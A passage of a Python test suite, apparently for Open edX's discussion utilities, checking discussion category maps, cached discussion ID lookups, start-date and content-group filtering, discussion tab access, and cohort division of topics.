category="discussion",
discussion_id="discussion2",
discussion_category="Chapter / Section / Subsection",
discussion_target="Discussion 2"
)
def test_empty(self):
utils.add_courseware_context([], self.course, self.user)
def test_missing_commentable_id(self):
orig = {"commentable_id": "non-inline"}
modified = dict(orig)
utils.add_courseware_context([modified], self.course, self.user)
assert modified == orig
def test_basic(self):
threads = [
{"commentable_id": self.discussion1.discussion_id},
{"commentable_id": self.discussion2.discussion_id}
]
utils.add_courseware_context(threads, self.course, self.user)
def assertThreadCorrect(thread, discussion, expected_title): # pylint: disable=invalid-name
"""Asserts that the given thread has the expected set of properties"""
assert set(thread.keys()) == set(['commentable_id', 'courseware_url', 'courseware_title'])
assert thread.get('courseware_url') == reverse('jump_to', kwargs={'course_id': str(self.course.id), 'location': str(discussion.location)})
assert thread.get('courseware_title') == expected_title
assertThreadCorrect(threads[0], self.discussion1, "Chapter / Discussion 1")
assertThreadCorrect(threads[1], self.discussion2, "Subsection / Discussion 2")
def test_empty_discussion_subcategory_title(self):
"""
Test that for empty subcategory inline discussion modules,
the divider " / " is not rendered on a post or inline discussion topic label.
"""
discussion = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion",
discussion_category="Chapter",
discussion_target="" # discussion-subcategory
)
thread = {"commentable_id": discussion.discussion_id}
utils.add_courseware_context([thread], self.course, self.user)
assert '/' not in thread.get('courseware_title')
@ddt.data((ModuleStoreEnum.Type.mongo, 2), (ModuleStoreEnum.Type.split, 1))
@ddt.unpack
def test_get_accessible_discussion_xblocks(self, modulestore_type, expected_discussion_xblocks):
"""
        Tests that discussion xblocks with no parents (orphans) are not fetched when using the split modulestore.
"""
course = CourseFactory.create(default_store=modulestore_type)
# Create a discussion xblock.
test_discussion = self.store.create_child(self.user.id, course.location, 'discussion', 'test_discussion')
# Assert that created discussion xblock is not an orphan.
assert test_discussion.location not in self.store.get_orphans(course.id)
# Assert that there is only one discussion xblock in the course at the moment.
assert len(utils.get_accessible_discussion_xblocks(course, self.user)) == 1
# The above call is request cached, so we need to clear it for this test.
RequestCache.clear_all_namespaces()
# Add an orphan discussion xblock to that course
orphan = course.id.make_usage_key('discussion', 'orphan_discussion')
self.store.create_item(self.user.id, orphan.course_key, orphan.block_type, block_id=orphan.block_id)
# Assert that the discussion xblock is an orphan.
assert orphan in self.store.get_orphans(course.id)
assert len(utils.get_accessible_discussion_xblocks(course, self.user)) == expected_discussion_xblocks
class CachedDiscussionIdMapTestCase(ModuleStoreTestCase):
"""
Tests that using the cache of discussion id mappings has the same behavior as searching through the course.
"""
ENABLED_SIGNALS = ['course_published']
def setUp(self):
super().setUp()
self.course = CourseFactory.create(org='TestX', number='101', display_name='Test Course')
self.discussion = ItemFactory.create(
parent_location=self.course.location,
category='discussion',
discussion_id='test_discussion_id',
discussion_category='Chapter',
discussion_target='Discussion 1'
)
self.discussion2 = ItemFactory.create(
parent_location=self.course.location,
category='discussion',
discussion_id='test_discussion_id_2',
discussion_category='Chapter 2',
discussion_target='Discussion 2'
)
self.private_discussion = ItemFactory.create(
parent_location=self.course.location,
category='discussion',
discussion_id='private_discussion_id',
discussion_category='Chapter 3',
discussion_target='Beta Testing',
visible_to_staff_only=True
)
RequestCache.clear_all_namespaces() # clear the cache before the last course publish
self.bad_discussion = ItemFactory.create(
parent_location=self.course.location,
category='discussion',
discussion_id='bad_discussion_id',
discussion_category=None,
discussion_target=None
)
def test_cache_returns_correct_key(self):
usage_key = utils.get_cached_discussion_key(self.course.id, 'test_discussion_id')
assert usage_key == self.discussion.location
def test_cache_returns_none_if_id_is_not_present(self):
usage_key = utils.get_cached_discussion_key(self.course.id, 'bogus_id')
assert usage_key is None
def test_cache_raises_exception_if_discussion_id_map_not_cached(self):
DiscussionsIdMapping.objects.all().delete()
with pytest.raises(utils.DiscussionIdMapIsNotCached):
utils.get_cached_discussion_key(self.course.id, 'test_discussion_id')
def test_cache_raises_exception_if_discussion_id_not_cached(self):
cache = DiscussionsIdMapping.objects.get(course_id=self.course.id)
cache.mapping = None
cache.save()
with pytest.raises(utils.DiscussionIdMapIsNotCached):
utils.get_cached_discussion_key(self.course.id, 'test_discussion_id')
def test_xblock_does_not_have_required_keys(self):
assert utils.has_required_keys(self.discussion)
assert not utils.has_required_keys(self.bad_discussion)
def verify_discussion_metadata(self):
"""Retrieves the metadata for self.discussion and self.discussion2 and verifies that it is correct"""
metadata = utils.get_cached_discussion_id_map(
self.course,
['test_discussion_id', 'test_discussion_id_2'],
self.user
)
discussion1 = metadata[self.discussion.discussion_id]
discussion2 = metadata[self.discussion2.discussion_id]
assert discussion1['location'] == self.discussion.location
assert discussion1['title'] == 'Chapter / Discussion 1'
assert discussion2['location'] == self.discussion2.location
assert discussion2['title'] == 'Chapter 2 / Discussion 2'
def test_get_discussion_id_map_from_cache(self):
self.verify_discussion_metadata()
def test_get_discussion_id_map_without_cache(self):
DiscussionsIdMapping.objects.all().delete()
self.verify_discussion_metadata()
def test_get_missing_discussion_id_map_from_cache(self):
metadata = utils.get_cached_discussion_id_map(self.course, ['bogus_id'], self.user)
assert metadata == {}
def test_get_discussion_id_map_from_cache_without_access(self):
user = UserFactory.create()
metadata = utils.get_cached_discussion_id_map(self.course, ['private_discussion_id'], self.user)
assert metadata['private_discussion_id']['title'] == 'Chapter 3 / Beta Testing'
metadata = utils.get_cached_discussion_id_map(self.course, ['private_discussion_id'], user)
assert metadata == {}
def test_get_bad_discussion_id(self):
metadata = utils.get_cached_discussion_id_map(self.course, ['bad_discussion_id'], self.user)
assert metadata == {}
def test_discussion_id_accessible(self):
assert utils.discussion_category_id_access(self.course, self.user, 'test_discussion_id')
def test_bad_discussion_id_not_accessible(self):
assert not utils.discussion_category_id_access(self.course, self.user, 'bad_discussion_id')
def test_missing_discussion_id_not_accessible(self):
assert not utils.discussion_category_id_access(self.course, self.user, 'bogus_id')
def test_discussion_id_not_accessible_without_access(self):
user = UserFactory.create()
assert utils.discussion_category_id_access(self.course, self.user, 'private_discussion_id')
assert not utils.discussion_category_id_access(self.course, user, 'private_discussion_id')
class CategoryMapTestMixin:
"""
Provides functionality for classes that test
`get_discussion_category_map`.
"""
def assert_category_map_equals(self, expected, requesting_user=None):
"""
Call `get_discussion_category_map`, and verify that it returns
what is expected.
"""
actual = utils.get_discussion_category_map(self.course, requesting_user or self.user)
actual['subcategories']['Week 1']['children'].sort()
assert actual == expected
class CategoryMapTestCase(CategoryMapTestMixin, ModuleStoreTestCase):
"""
Base testcase class for discussion categories for the
comment client service integration
"""
def setUp(self):
super().setUp()
self.course = CourseFactory.create(
org="TestX", number="101", display_name="Test Course",
# This test needs to use a course that has already started --
# discussion topics only show up if the course has already started,
# and the default start date for courses is Jan 1, 2030.
start=datetime.datetime(2012, 2, 3, tzinfo=UTC)
)
# Courses get a default discussion topic on creation, so remove it
self.course.discussion_topics = {}
self.discussion_num = 0
self.instructor = InstructorFactory(course_key=self.course.id)
self.maxDiff = None # pylint: disable=invalid-name
self.later = datetime.datetime(2050, 1, 1, tzinfo=UTC)
def create_discussion(self, discussion_category, discussion_target, **kwargs):
self.discussion_num += 1
return ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id=f"discussion{self.discussion_num}",
discussion_category=discussion_category,
discussion_target=discussion_target,
**kwargs
)
def assert_category_map_equals(self, expected, divided_only_if_explicit=False, exclude_unstarted=True): # pylint: disable=arguments-differ
"""
Asserts the expected map with the map returned by get_discussion_category_map method.
"""
assert utils.get_discussion_category_map(self.course, self.instructor, divided_only_if_explicit, exclude_unstarted) == expected
def test_empty(self):
self.assert_category_map_equals({"entries": {}, "subcategories": {}, "children": []})
def test_configured_topics(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
def check_cohorted_topics(expected_ids):
self.assert_category_map_equals(
{
"entries": {
"Topic A": {"id": "Topic_A", "sort_key": "Topic A", "is_divided": "Topic_A" in expected_ids},
"Topic B": {"id": "Topic_B", "sort_key": "Topic B", "is_divided": "Topic_B" in expected_ids},
"Topic C": {"id": "Topic_C", "sort_key": "Topic C", "is_divided": "Topic_C" in expected_ids},
},
"subcategories": {},
"children": [("Topic A", TYPE_ENTRY), ("Topic B", TYPE_ENTRY), ("Topic C", TYPE_ENTRY)]
}
)
check_cohorted_topics([]) # default (empty) cohort config
set_discussion_division_settings(self.course.id, enable_cohorts=False)
check_cohorted_topics([])
set_discussion_division_settings(self.course.id, enable_cohorts=True)
check_cohorted_topics([])
set_discussion_division_settings(
self.course.id,
enable_cohorts=True,
divided_discussions=["Topic_B", "Topic_C"]
)
check_cohorted_topics(["Topic_B", "Topic_C"])
set_discussion_division_settings(
self.course.id,
enable_cohorts=True,
divided_discussions=["Topic_A", "Some_Other_Topic"]
)
check_cohorted_topics(["Topic_A"])
# unlikely case, but make sure it works.
set_discussion_division_settings(
self.course.id,
enable_cohorts=False,
divided_discussions=["Topic_A"]
)
check_cohorted_topics([])
def test_single_inline(self):
self.create_discussion("Chapter", "Discussion")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Chapter", TYPE_SUBCATEGORY)]
}
)
def test_inline_with_always_divide_inline_discussion_flag(self):
self.create_discussion("Chapter", "Discussion")
set_discussion_division_settings(self.course.id, enable_cohorts=True, always_divide_inline_discussions=True)
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion": {
"id": "discussion1",
"sort_key": None,
"is_divided": True,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Chapter", TYPE_SUBCATEGORY)]
}
)
def test_inline_without_always_divide_inline_discussion_flag(self):
self.create_discussion("Chapter", "Discussion")
set_discussion_division_settings(self.course.id, enable_cohorts=True)
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Chapter", TYPE_SUBCATEGORY)]
},
divided_only_if_explicit=True
)
def test_get_unstarted_discussion_xblocks(self):
self.create_discussion("Chapter 1", "Discussion 1", start=self.later)
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
"start_date": self.later
}
},
"subcategories": {},
"children": [("Discussion 1", TYPE_ENTRY)],
"start_date": self.later,
"sort_key": "Chapter 1"
}
},
"children": [("Chapter 1", TYPE_SUBCATEGORY)]
},
divided_only_if_explicit=True,
exclude_unstarted=False
)
def test_tree(self):
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 1", "Discussion 2")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion")
self.create_discussion("Chapter 3 / Section 1", "Discussion")
def check_divided(is_divided):
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_divided": is_divided,
},
"Discussion 2": {
"id": "discussion2",
"sort_key": None,
"is_divided": is_divided,
}
},
"subcategories": {},
"children": [("Discussion 1", TYPE_ENTRY), ("Discussion 2", TYPE_ENTRY)]
},
"Chapter 2": {
"entries": {
"Discussion": {
"id": "discussion3",
"sort_key": None,
"is_divided": is_divided,
}
},
"subcategories": {
"Section 1": {
"entries": {},
"subcategories": {
"Subsection 1": {
"entries": {
"Discussion": {
"id": "discussion4",
"sort_key": None,
"is_divided": is_divided,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
},
"Subsection 2": {
"entries": {
"Discussion": {
"id": "discussion5",
"sort_key": None,
"is_divided": is_divided,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Subsection 1", TYPE_SUBCATEGORY), ("Subsection 2", TYPE_SUBCATEGORY)]
}
},
"children": [("Discussion", TYPE_ENTRY), ("Section 1", TYPE_SUBCATEGORY)]
},
"Chapter 3": {
"entries": {},
"subcategories": {
"Section 1": {
"entries": {
"Discussion": {
"id": "discussion6",
"sort_key": None,
"is_divided": is_divided,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Section 1", TYPE_SUBCATEGORY)]
}
},
"children": [("Chapter 1", TYPE_SUBCATEGORY), ("Chapter 2", TYPE_SUBCATEGORY),
("Chapter 3", TYPE_SUBCATEGORY)]
}
)
# empty / default config
check_divided(False)
# explicitly disabled cohorting
set_discussion_division_settings(self.course.id, enable_cohorts=False)
check_divided(False)
        # explicitly enable courses divided by cohort, with inline discussions also divided.
set_discussion_division_settings(self.course.id, enable_cohorts=True, always_divide_inline_discussions=True)
check_divided(True)
def test_tree_with_duplicate_targets(self):
self.create_discussion("Chapter 1", "Discussion A")
self.create_discussion("Chapter 1", "Discussion B")
self.create_discussion("Chapter 1", "Discussion A") # duplicate
self.create_discussion("Chapter 1", "Discussion A") # another duplicate
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion") # duplicate
category_map = utils.get_discussion_category_map(self.course, self.user)
chapter1 = category_map["subcategories"]["Chapter 1"]
chapter1_discussions = set(["Discussion A", "Discussion B", "Discussion A (1)", "Discussion A (2)"])
chapter1_discussions_with_types = set([("Discussion A", TYPE_ENTRY), ("Discussion B", TYPE_ENTRY),
("Discussion A (1)", TYPE_ENTRY), ("Discussion A (2)", TYPE_ENTRY)])
assert set(chapter1['children']) == chapter1_discussions_with_types
assert set(chapter1['entries'].keys()) == chapter1_discussions
chapter2 = category_map["subcategories"]["Chapter 2"]
subsection1 = chapter2["subcategories"]["Section 1"]["subcategories"]["Subsection 1"]
subsection1_discussions = set(["Discussion", "Discussion (1)"])
subsection1_discussions_with_types = set([("Discussion", TYPE_ENTRY), ("Discussion (1)", TYPE_ENTRY)])
assert set(subsection1['children']) == subsection1_discussions_with_types
assert set(subsection1['entries'].keys()) == subsection1_discussions
def test_start_date_filter(self):
now = datetime.datetime.now()
self.create_discussion("Chapter 1", "Discussion 1", start=now)
self.create_discussion("Chapter 1", "Discussion 2 обсуждение", start=self.later)
self.create_discussion("Chapter 2", "Discussion", start=now)
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion", start=self.later)
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion", start=self.later)
self.create_discussion("Chapter 3 / Section 1", "Discussion", start=self.later)
assert not self.course.self_paced
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion 1", TYPE_ENTRY)]
},
"Chapter 2": {
"entries": {
"Discussion": {
"id": "discussion3",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Chapter 1", TYPE_SUBCATEGORY), ("Chapter 2", TYPE_SUBCATEGORY)]
}
)
def test_self_paced_start_date_filter(self):
self.course.self_paced = True
now = datetime.datetime.now()
self.create_discussion("Chapter 1", "Discussion 1", start=now)
self.create_discussion("Chapter 1", "Discussion 2", start=self.later)
self.create_discussion("Chapter 2", "Discussion", start=now)
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion", start=self.later)
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion", start=self.later)
self.create_discussion("Chapter 3 / Section 1", "Discussion", start=self.later)
assert self.course.self_paced
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
},
"Discussion 2": {
"id": "discussion2",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion 1", TYPE_ENTRY), ("Discussion 2", TYPE_ENTRY)]
},
"Chapter 2": {
"entries": {
"Discussion": {
"id": "discussion3",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {
"Section 1": {
"entries": {},
"subcategories": {
"Subsection 1": {
"entries": {
"Discussion": {
"id": "discussion4",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
},
"Subsection 2": {
"entries": {
"Discussion": {
"id": "discussion5",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Subsection 1", TYPE_SUBCATEGORY), ("Subsection 2", TYPE_SUBCATEGORY)]
}
},
"children": [("Discussion", TYPE_ENTRY), ("Section 1", TYPE_SUBCATEGORY)]
},
"Chapter 3": {
"entries": {},
"subcategories": {
"Section 1": {
"entries": {
"Discussion": {
"id": "discussion6",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
"children": [("Discussion", TYPE_ENTRY)]
}
},
"children": [("Section 1", TYPE_SUBCATEGORY)]
}
},
"children": [("Chapter 1", TYPE_SUBCATEGORY), ("Chapter 2", TYPE_SUBCATEGORY),
("Chapter 3", TYPE_SUBCATEGORY)]
}
)
def test_sort_inline_explicit(self):
self.create_discussion("Chapter", "Discussion 1", sort_key="D")
self.create_discussion("Chapter", "Discussion 2", sort_key="A")
self.create_discussion("Chapter", "Discussion 3", sort_key="E")
self.create_discussion("Chapter", "Discussion 4", sort_key="C")
self.create_discussion("Chapter", "Discussion 5", sort_key="B")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": "D",
"is_divided": False,
},
"Discussion 2": {
"id": "discussion2",
"sort_key": "A",
"is_divided": False,
},
"Discussion 3": {
"id": "discussion3",
"sort_key": "E",
"is_divided": False,
},
"Discussion 4": {
"id": "discussion4",
"sort_key": "C",
"is_divided": False,
},
"Discussion 5": {
"id": "discussion5",
"sort_key": "B",
"is_divided": False,
}
},
"subcategories": {},
"children": [
("Discussion 2", TYPE_ENTRY),
("Discussion 5", TYPE_ENTRY),
("Discussion 4", TYPE_ENTRY),
("Discussion 1", TYPE_ENTRY),
("Discussion 3", TYPE_ENTRY)
]
}
},
"children": [("Chapter", TYPE_SUBCATEGORY)]
}
)
def test_sort_configured_topics_explicit(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A", "sort_key": "B"},
"Topic B": {"id": "Topic_B", "sort_key": "C"},
"Topic C": {"id": "Topic_C", "sort_key": "A"}
}
self.assert_category_map_equals(
{
"entries": {
"Topic A": {"id": "Topic_A", "sort_key": "B", "is_divided": False},
"Topic B": {"id": "Topic_B", "sort_key": "C", "is_divided": False},
"Topic C": {"id": "Topic_C", "sort_key": "A", "is_divided": False},
},
"subcategories": {},
"children": [("Topic C", TYPE_ENTRY), ("Topic A", TYPE_ENTRY), ("Topic B", TYPE_ENTRY)]
}
)
def test_sort_alpha(self):
self.course.discussion_sort_alpha = True
self.create_discussion("Chapter", "Discussion D")
self.create_discussion("Chapter", "Discussion A")
self.create_discussion("Chapter", "Discussion E")
self.create_discussion("Chapter", "Discussion C")
self.create_discussion("Chapter", "Discussion B")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion D": {
"id": "discussion1",
"sort_key": "Discussion D",
"is_divided": False,
},
"Discussion A": {
"id": "discussion2",
"sort_key": "Discussion A",
"is_divided": False,
},
"Discussion E": {
"id": "discussion3",
"sort_key": "Discussion E",
"is_divided": False,
},
"Discussion C": {
"id": "discussion4",
"sort_key": "Discussion C",
"is_divided": False,
},
"Discussion B": {
"id": "discussion5",
"sort_key": "Discussion B",
"is_divided": False,
}
},
"subcategories": {},
"children": [
("Discussion A", TYPE_ENTRY),
("Discussion B", TYPE_ENTRY),
("Discussion C", TYPE_ENTRY),
("Discussion D", TYPE_ENTRY),
("Discussion E", TYPE_ENTRY)
]
}
},
"children": [("Chapter", TYPE_SUBCATEGORY)]
}
)
def test_sort_intermediates(self):
self.create_discussion("Chapter B", "Discussion 2")
self.create_discussion("Chapter C", "Discussion")
self.create_discussion("Chapter A", "Discussion 1")
self.create_discussion("Chapter B", "Discussion 1")
self.create_discussion("Chapter A", "Discussion 2")
self.assert_category_map_equals(
{
"children": [("Chapter A", TYPE_SUBCATEGORY), ("Chapter B", TYPE_SUBCATEGORY),
("Chapter C", TYPE_SUBCATEGORY)],
"entries": {},
"subcategories": {
"Chapter A": {
"children": [("Discussion 1", TYPE_ENTRY), ("Discussion 2", TYPE_ENTRY)],
"entries": {
"Discussion 1": {
"id": "discussion3",
"sort_key": None,
"is_divided": False,
},
"Discussion 2": {
"id": "discussion5",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
},
"Chapter B": {
"children": [("Discussion 2", TYPE_ENTRY), ("Discussion 1", TYPE_ENTRY)],
"entries": {
"Discussion 2": {
"id": "discussion1",
"sort_key": None,
"is_divided": False,
},
"Discussion 1": {
"id": "discussion4",
"sort_key": None,
"is_divided": False,
}
},
"subcategories": {},
},
"Chapter C": {
"entries": {
"Discussion": {
"id": "discussion2",
"sort_key": None,
"is_divided": False,
}
},
"children": [("Discussion", TYPE_ENTRY)],
"subcategories": {},
}
},
}
)
def test_ids_empty(self):
assert utils.get_discussion_categories_ids(self.course, self.user) == []
def test_ids_configured_topics(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
assert len(utils.get_discussion_categories_ids(self.course, self.user)) ==\
len(["Topic_A", "Topic_B", "Topic_C"])
def test_ids_inline(self):
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 1", "Discussion 2")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion")
self.create_discussion("Chapter 3 / Section 1", "Discussion")
assert len(utils.get_discussion_categories_ids(self.course, self.user)) ==\
len(["discussion1", "discussion2", "discussion3", "discussion4", "discussion5", "discussion6"])
def test_ids_mixed(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
assert len(utils.get_discussion_categories_ids(self.course, self.user)) ==\
len(["Topic_A", "Topic_B", "Topic_C", "discussion1", "discussion2", "discussion3"])
class ContentGroupCategoryMapTestCase(CategoryMapTestMixin, ContentGroupTestCase):
"""
Tests `get_discussion_category_map` on discussion xblocks which are
only visible to some content groups.
"""
def test_staff_user(self):
"""
Verify that the staff user can access the alpha, beta, and
global discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
('Visible to Alpha', 'entry'),
('Visible to Beta', 'entry'),
('Visible to Everyone', 'entry')
],
'entries': {
'Visible to Alpha': {
'sort_key': None,
'is_divided': False,
'id': 'alpha_group_discussion'
},
'Visible to Beta': {
'sort_key': None,
'is_divided': False,
'id': 'beta_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_divided': False,
'id': 'global_group_discussion'
}
}
}
},
'children': [('General', 'entry'), ('Week 1', 'subcategory')],
'entries': {
'General': {
'sort_key': 'General',
'is_divided': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.staff_user
)
def test_alpha_user(self):
"""
Verify that the alpha user can access the alpha and global
discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
('Visible to Alpha', 'entry'),
('Visible to Everyone', 'entry')
],
'entries': {
'Visible to Alpha': {
'sort_key': None,
'is_divided': False,
'id': 'alpha_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_divided': False,
'id': 'global_group_discussion'
}
}
}
},
'children': [('General', 'entry'), ('Week 1', 'subcategory')],
'entries': {
'General': {
'sort_key': 'General',
'is_divided': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.alpha_user
)
def test_beta_user(self):
"""
Verify that the beta user can access the beta and global
discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [('Visible to Beta', 'entry'), ('Visible to Everyone', 'entry')],
'entries': {
'Visible to Beta': {
'sort_key': None,
'is_divided': False,
'id': 'beta_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_divided': False,
'id': 'global_group_discussion'
}
}
}
},
'children': [('General', 'entry'), ('Week 1', 'subcategory')],
'entries': {
'General': {
'sort_key': 'General',
'is_divided': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.beta_user
)
def test_non_cohorted_user(self):
"""
Verify that the non-cohorted user can access the global
discussion topic.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
('Visible to Everyone', 'entry')
],
'entries': {
'Visible to Everyone': {
'sort_key': None,
'is_divided': False,
'id': 'global_group_discussion'
}
}
}
},
'children': [('General', 'entry'), ('Week 1', 'subcategory')],
'entries': {
'General': {
'sort_key': 'General',
'is_divided': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.non_cohorted_user
)
class JsonResponseTestCase(TestCase, UnicodeTestMixin):
def _test_unicode_data(self, text):
response = utils.JsonResponse(text)
reparsed = json.loads(response.content.decode('utf-8'))
assert reparsed == text
class DiscussionTabTestCase(ModuleStoreTestCase):
""" Test visibility of the discussion tab. """
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
self.enrolled_user = UserFactory.create()
self.staff_user = AdminFactory.create()
CourseEnrollmentFactory.create(user=self.enrolled_user, course_id=self.course.id)
self.unenrolled_user = UserFactory.create()
def discussion_tab_present(self, user):
""" Returns true if the user has access to the discussion tab. """
request = RequestFactory().request()
all_tabs = get_course_tab_list(user, self.course)
return any(tab.type == 'discussion' for tab in all_tabs)
def test_tab_access(self):
with self.settings(FEATURES={'ENABLE_DISCUSSION_SERVICE': True}):
assert self.discussion_tab_present(self.staff_user)
assert self.discussion_tab_present(self.enrolled_user)
assert not self.discussion_tab_present(self.unenrolled_user)
@mock.patch('lms.djangoapps.ccx.overrides.get_current_ccx')
def test_tab_settings(self, mock_get_ccx):
mock_get_ccx.return_value = True
with self.settings(FEATURES={'ENABLE_DISCUSSION_SERVICE': False}):
assert not self.discussion_tab_present(self.enrolled_user)
with self.settings(FEATURES={'CUSTOM_COURSES_EDX': True}):
assert not self.discussion_tab_present(self.enrolled_user)
class IsCommentableDividedTestCase(ModuleStoreTestCase):
"""
Test the is_commentable_divided function.
"""
MODULESTORE = TEST_DATA_MIXED_MODULESTORE
def setUp(self):
"""
Make sure that course is reloaded every time--clear out the modulestore.
"""
super().setUp()
self.toy_course_key = ToyCourseFactory.create().id
def test_is_commentable_divided(self):
course = modulestore().get_course(self.toy_course_key)
assert not cohorts.is_course_cohorted(course.id)
def to_id(name):
"""Helper for topic_name_to_id that uses course."""
return topic_name_to_id(course, name)
# no topics
assert not utils.is_commentable_divided(course.id, to_id('General')), "Course doesn't even have a 'General' topic"
# not cohorted
config_course_cohorts(course, is_cohorted=False)
config_course_discussions(course, discussion_topics=["General", "Feedback"])
assert not utils.is_commentable_divided(course.id, to_id('General')), "Course isn't cohorted"
# cohorted, but top level topics aren't
config_course_cohorts(course, is_cohorted=True)
config_course_discussions(course, discussion_topics=["General", "Feedback"])
assert cohorts.is_course_cohorted(course.id)
assert not utils.is_commentable_divided(course.id, to_id('General')), "Course is cohorted, but 'General' isn't."
        # cohorted, with the "Feedback" top-level topic explicitly divided (the other top-level topics aren't)
config_course_cohorts(
course,
is_cohorted=True
)
config_course_discussions(course, discussion_topics=["General", "Feedback"], divided_discussions=["Feedback"])
assert cohorts.is_course_cohorted(course.id)
assert not utils.is_commentable_divided(course.id, to_id('General')), "Course is cohorted, but 'General' isn't."
assert utils.is_commentable_divided(course.id, to_id('Feedback')), 'Feedback was listed as cohorted. Should be.'
def test_is_commentable_divided_inline_discussion(self):
course = modulestore().get_course(self.toy_course_key)
assert not cohorts.is_course_cohorted(course.id)
def to_id(name):
return topic_name_to_id(course, name)
config_course_cohorts(
course,
is_cohorted=True,
)
config_course_discussions(
course,
discussion_topics=["General", "Feedback"],
divided_discussions=["Feedback", "random_inline"]
)
        assert not utils.is_commentable_divided(course.id, to_id('random')), 'By default, non-top-level discussions are not cohorted in a cohorted course.'
# if always_divide_inline_discussions is set to False, non-top-level discussion are always
# not divided unless they are explicitly set in divided_discussions
config_course_cohorts(
course,
is_cohorted=True,
)
config_course_discussions(
course,
discussion_topics=["General", "Feedback"],
divided_discussions=["Feedback", "random_inline"],
always_divide_inline_discussions=False
)
assert not utils.is_commentable_divided(course.id, to_id('random')), 'Non-top-level discussion is not cohorted if always_divide_inline_discussions is False.'
        assert utils.is_commentable_divided(course.id, to_id('random_inline')), 'If always_divide_inline_discussions is set to False, a non-top-level discussion is still cohorted when explicitly listed in divided_discussions.'
        assert utils.is_commentable_divided(course.id, to_id('Feedback')), 'If always_divide_inline_discussions is set to False, top-level discussions are not affected.'
def test_is_commentable_divided_team(self):
course = modulestore().get_course(self.toy_course_key)
assert not cohorts.is_course_cohorted(course.id)
config_course_cohorts(course, is_cohorted=True)
